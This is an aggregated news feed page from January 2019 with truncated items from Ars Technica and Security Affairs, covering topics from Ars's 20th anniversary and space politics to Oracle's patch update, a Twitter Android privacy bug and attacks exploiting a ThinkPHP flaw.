News & Updates

Actually, I think that was a popular timepiece style when the site first started.

Enlarge / Actually, I think that was a popular timepiece style when the site first started. (credit: Aurich Lawson / Getty Images)

It’s true—Ars Technica is in the process of turning 20 years old throughout 2019. If you’ve ever looked at the whois info, our official birthday hits on December 29. But Ars was really birthed all throughout that first year, as Editor-in-Chief Ken Fisher (err, Caesar) and his fellow computer prosumers figured out how to start the most comprehensive PC enthusiast outlet around. “Our love for the PC is gonna lead us into bad, bad things like NT, Linux, and BeOS content under the same roof,” as the original Ars Mission Statement noted. “Please don’t report us!”

Since then, well, Ars has definitely expanded. You can find anything from LARPing to archaeology industry trends alongside the latest Linux review on the site today. But throughout these past two decades and the site’s numerous evolutions, Ars still feels like it has stuck with the ethos of that initial public declaration—”having fun, being productive, and being as informative and as accurate as possible,” as Caesar put it.

So to cap off this week (itself likely a small start to what will inevitably be numerous trips down memory lane during our 20th anniversary year), we recently polled the Ars community—aka, staff and readers—to find out what folks consider some of the site’s greatest hits. The first batch of story suggestions is below, but don’t be shy about starting a second list in the comments.

Read 21 remaining paragraphs | Comments

Source: http://feeds.arstechnica.com/arstechnica/index/

Roscosmos head Dmitry Rogozin is photographed in October, 2018, after the launch failure of a Soyuz-FG rocket.

Enlarge / Roscosmos head Dmitry Rogozin is photographed in October, 2018, after the launch failure of a Soyuz-FG rocket. (credit: Alexei Filippov/TASS via Getty Images)

After an American Apollo and Soviet Soyuz spacecraft docked in orbit during the height of the Cold War, in 1975, the two leading space powers gradually worked more and more together on civil space activities. Over time, they forged a successful and, among astronauts and engineers at least, even a comfortable bond. But of late, that bond is fraying, and long-term it may unravel entirely.

The most immediate issue involves Dmitry Rogozin, appointed to lead the Russian space corporation Roscosmos in May 2018. Overtly political, Rogozin shares Vladimir Putin’s antipathy toward the West. Following the Crimean crisis in 2014, Rogozin was one of seven Russian officials sanctioned by the Obama administration. In response, he taunted NASA, which relied then (and still does) on Russian Soyuz spacecraft to reach the International Space Station.

“After analyzing the sanctions against our space industry, I suggest to the USA to bring their astronauts to the International Space Station using a trampoline,” Rogozin, then a deputy prime minister of Russia over defense and space, tweeted in Russian at the time.

Read 13 remaining paragraphs | Comments

Source: http://feeds.arstechnica.com/arstechnica/index/

Michael Burnham is all of us.

Enlarge / Michael Burnham is all of us. (credit: CBS)

In many ways, this season felt very much like a much-needed reset from the previous one. The Klingon war is over, and the Federation is consumed by a new scientific pursuit: mysterious red bursts of light that have appeared across 30,000 light years.

The scene that really drove home the reset was the formal roll call, where our bridge characters say their names—really, directly to the audience.

It’s still baffling that we went an entire season without knowing most of the bridge crew’s names! Yes, we sort of got to know a handful of characters, but there are regular faces that we’ve seen many times on the bridge. If like the other shows, where the bulk of each episode happens in the nerve center of the ship, it would help to know who we’re interacting with.

Read 23 remaining paragraphs | Comments

Source: http://feeds.arstechnica.com/arstechnica/index/

Oracle released the first critical patch advisory for 2019 that addresses a total of 284 vulnerabilities, 33 of them are rated “critical”.

Let’s give a close look at some of the vulnerabilities fixed by this patch advisory.

The advisory fixed the CVE-2016-1000031 flaw, a remote code execution (RCE) bug in the Apache Commons FileUpload,  disclosed in November last year. The Commons FileUpload library is the default file upload mechanism in Struts 2, the CVE-2016-1000031 was discovered two years ago by experts at Tenable.

The bug affected the OCA’s Diameter Signalling Router component and its Communications Services Gatekeeper. The flaw also affected the Financial Services Analytical Applications Infrastructure, the Fusion Middleware MapViewer, and four three Oracle Retail components.

A vulnerability in the Apache Log4j tracked as CVE-2017-5645 impacted the Oracle’s Converged Application Server – Service Controller, the OCA Online Mediation Controller Service Broker, the WebRTC Session Controller, the FLEXCUBE component in Oracle Financial Services Applications, the Fusion’s GoldenGate app adapters and SOA Suite, and also a Sun tape library component.

The CVE-2017-5645 flaw resides in the Codehaus versions of Groovy and affected OCA Unified Inventory Management.

The critical patch advisory for 2019 also fixed the CVE-2018-11776 vulnerability in the OCA’s Communications Policy Management Component, this issue was exploited in 2018 by threat actors to mine cryptocurrency.

Oracle also addressed an arbitrary file upload flaw (CVE-2018-9206) in the OCA’s Services Gatekeeper that also impacted Primavera P6 in the Construction and Engineering Suite, and Siebel CRM.

Another bug fixed by Big Red affected the Oracle E-Business’ Performance Management component, it was in CVE-2019-2453:

“Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Performance Management.” reads the description provided by

“Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Performance Management accessible data as well as unauthorized access to critical data or complete access to all Oracle Performance Management accessible data. “

Oracle addressed the CVE-2016-4000 flaw, Jython provided a vector for arbitrary code, it is used by Oracle Enterprise Manager platform, Banking Platform, and Utilities Network Management System.

The list is very long, it also includes patches for a DoS in the Derby
Apache tool used in the WebLogic server (CVE-2015-1832) and an RCE bug in the Spring framework used by Oracle Tuxedo and the Sun Tape Library ACSLS component.

People interested in the full list could visit the following address:

https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html

window._mNHandle = window._mNHandle || {};
window._mNHandle.queue = window._mNHandle.queue || [];
medianet_versionId = “3121199”;

try {
window._mNHandle.queue.push(function () {
window._mNDetails.loadTag(“762221962”, “300×250”, “762221962”);
});
}
catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, critical patch advisory)

The post Oracle critical patch advisory addresses 284 flaws, 33 critical appeared first on Security Affairs.

Source: Security affairs

The US Supreme Court is shown on the day of the investiture ceremony for new Supreme Court Associate Justice Brett Kavanaugh on November 8, 2018 in Washington, DC.

Enlarge / The US Supreme Court is shown on the day of the investiture ceremony for new Supreme Court Associate Justice Brett Kavanaugh on November 8, 2018 in Washington, DC. (credit: Mark Wilson / Getty Images)

The legal system is often a confounding place, where disputes are adjudicated—it’s a world full of jargon that we journalists try to explain as best we can. And over the last two decades, legal cases have remained a fixture on Ars Technica.

We’ve brought you endless news of initial criminal or civil complaints in that time. And in the most important cases, Ars has followed them, blow by blow, through various motions. We sat in every session for the criminal trial of Silk Road mastermind Ross Ulbricht and took a similar approach to the API patents saga of Oracle v. Google, for instance.

Just this week, Ars sat in the courtroom as Defense Distributed and the State of New Jersey argued over legal jurisdiction and matters of free speech intersecting with future technology. It echoes back to our site’s legacy of watching the march of technology and innovation directly intersect with an evolving legal system—it has been nearly 20 years since we covered Microsoft’s infamous antitrust battles around the turn of the century. These literally became the subject of CNN decade documentaries since then.

Read 120 remaining paragraphs | Comments

Source: http://feeds.arstechnica.com/arstechnica/index/

A Falcon 9 rocket launches from Vandenberg Air Force Base.

Enlarge / A Falcon 9 rocket launches from Vandenberg Air Force Base. (credit: Aurich Lawson/SpaceX)

Welcome to Edition 1.32 of the Rocket Report! As we get deeper into the new year, the launch business is starting to heat up, especially among the smaller rockets. Companies are eyeing launch sites, securing launch contracts, and scrambling on development of their rockets. This is simply going to be a huge year for small-sat launchers, and we’re going to do our best to stay on top of everything.

As always, we welcome reader submissions, and if you don’t want to miss an issue, please subscribe using the box below (the form will not appear on AMP-enabled versions of the site). Each report will include information on small-, medium-, and heavy-lift rockets as well as a quick look ahead at the next three launches on the calendar.

Relativity Space to launch from historic Florida site. The company that aspires to 3D print almost the entirety of its rockets has reached an agreement with the US Air Force to launch from historic facilities at Cape Canaveral Air Force Station in Florida. Relativity Space said Thursday it has a multiyear contract to build and operate its own rocket launch facilities at Launch Complex 16, Ars reported.

Read 24 remaining paragraphs | Comments

Source: http://feeds.arstechnica.com/arstechnica/index/

Even after so many efforts by Google for preventing its Play Store from malware, shady apps somehow managed to fool its anti-malware protections and get into its service to infect Android users with malware.

Two such Android apps have recently been spotted on the Google Play Store by security researchers with the Trend Micro malware research team, infecting thousands of Android users who have


Source: http://feeds.feedburner.com/TheHackersNews

For teens, digital technology is good. Or bad. Or maybe neutral?

Enlarge (credit: SimpleTexting.com)

In South Korea, people under the age of 16 can’t play online games between midnight and 6am. The UK Parliament has launched an official inquiry into “the impact of social media and screen use on young people’s health.” Meanwhile in the United States, the Wait Until 8th campaign asks parents to delay giving their children a smartphone until they’re in eighth grade. Worry about kids and technology is rampant—so have smartphones, in fact, destroyed a generation?

A paper published in Nature Human Behaviour this week answers that question, often differently, thousands and thousands of times. Researchers Amy Orben and Andrew Przybylski took three huge datasets and threw every possible meaningful question at them. In part, their analysis is an illustration of how different researchers can get wildly different answers from the same data. But cumulatively, the answers they came up with indicate that tech use correlates with a teeny-tiny dent in adolescent well-being—and that there’s a big problem with big data.

High numbers don’t necessarily mean high quality

Studying small numbers of people, or rats, or trees can be a problem for scientists. Comparisons between small groups of subjects might miss a real finding or luck out and find something that looks like a pattern but is actually just noise. And it’s always tricky to generalize from a small group to a whole population. Sometimes small is the only sort of data that’s available, but some research disciplines have had the recent(-ish) boon of gigantic, rich datasets to work with.

Read 15 remaining paragraphs | Comments

Source: http://feeds.arstechnica.com/arstechnica/index/

A bug in the Twitter app for Android may have had exposed tweets, the social media platform revealed on Thursday.

The bug in the Android Twitter app affects the “Protect my Tweets” option from the account’s “Privacy and safety” settings that allows viewing user’s posts only to approved followers.

People who used the Twitter app for Android may have had the protected tweets setting disabled after they made some changes to account settings, for example after a change to the email address associated with the profile.

“We’ve become aware of an issue in Twitter for Android that disabled the “Protect your Tweets” setting if certain account changes were made.” reads the security advisory published by the company.

“You may have been impacted by this issue if you had protected Tweets turned on in your settings, used Twitter for Android, and made certain changes to account settings such as changing the email address associated with your account between November 3, 2014, and January 14, 2019.”

The vulnerability was introduced on November 3, 2014, and was fixed on January 14, 2019, users using the iOS app or the web version were not impacted. 

Twitter has notified impacted users and has turned “Protect your Tweets” back on for them if it was disabled.

“We are providing this broader notice through the Twitter Help Center since we can’t confirm every account that may have been impacted. We encourage you to review your privacy settings to ensure that your ‘Protect your Tweets’ setting reflects your preferences,” continues the advisory.

Recently Twitter addressed a similar bug, in December the researcher Terence Eden discovered that the permissions dialog when authorizing certain apps to Twitter could expose direct messages to the third-party.

In September 2018, the company announced that an issue in Twitter Account Activity API had exposed some users’ direct messages (DMs) and protected tweets to wrong developers.

Twitter is considered one of the most powerful social media platforms, it was used in multiple cases by nation-state actors as a vector for disinformation and propaganda.

In December Twitter discovered a possible nation-state attack while it was investigating an information disclosure flaw affecting its platform.

window._mNHandle = window._mNHandle || {};
window._mNHandle.queue = window._mNHandle.queue || [];
medianet_versionId = “3121199”;

try {
window._mNHandle.queue.push(function () {
window._mNDetails.loadTag(“762221962”, “300×250”, “762221962”);
});
}
catch (error) {}

Pierluigi Paganini

(SecurityAffairs – Twitter app, Android)

The post Twitter fixed a bug in its Android App that exposed Protected Tweets appeared first on Security Affairs.

Source: Security affairs

Threat actors in the wild are leveraging a recently discovered flaw in the ThinkPHP PHP framework to install cryptominers, skimmers, and other malware.

Multiple threat actors are leveraging a recently discovered code execution vulnerability (CVE-2018-20062) in the ThinkPHP framework.

The flaw was already addressed by the Chinese firm TopThink that designed the framework, but security expert Larry Cashdollar at
Akamai’s Security Incident Response Team has now discovered active exploits of the flaw in the wild.

Cashdollar was investigating a recent Magecart campaign when discovered a new strain of malware.

“While investigating the recent Magecart card skimming attacks, I came across a payload I was not familiar with.  Further research into it lead me to discover that in December a researcher disclosed a remote command execution vulnerability in ThinkPHP, a web framework by TopThink.” reads the analysis published by the expert.

“The developers fixed the vulnerability stating that because “the framework does not detect the controller name enough, it may lead to possible ‘getshell‘ vulnerabilities without the forced routing enabled.”

Multiple attackers are using relatively simple techniques to trigger the issue, according to Cashdollar, they can leverage a single line of code to scan for the flaw.

Once discovered the flaw, the attackers could use publicly available code to exploit it and install several malicious codes.
Cashdollar said that in one case, threat actors exploited the flaw to deliver a varian of the Mirai bot.

“There are multiple actors abusing this flaw to install everything from a Mirai like botnet to Microsoft Windows malware. ” continues the post.

The analysis of sample from the last 7 days revealed that the majority of IP addresses are from the Asia Pacific region where the ThinkPHP framework is most popular.

ThinkPHP flaw

Cashdollar confirmed that threat actors are actively scanning systems across the world.

To secure your system update the framework to the current version.

“There is so much attack traffic, and so many ways to hide, criminals no longer worry about the tracks they’ve left behind. The goal now is to get command execution as any user, on any type of system, to either spread a botnet, distribute malware, or mine cryptocurrency.” concludes the expert.

“We will see more cross-pollination of command execution vulnerabilities in web apps, enterprise software, and IoT devices being used against multiple target platforms.”

window._mNHandle = window._mNHandle || {};
window._mNHandle.queue = window._mNHandle.queue || [];
medianet_versionId = “3121199”;

try {
window._mNHandle.queue.push(function () {
window._mNDetails.loadTag(“762221962”, “300×250”, “762221962”);
});
}
catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, ThinkPHP)

The post Attacks in the wild leverage flaw in ThinkPHP Framework appeared first on Security Affairs.

Source: Security affairs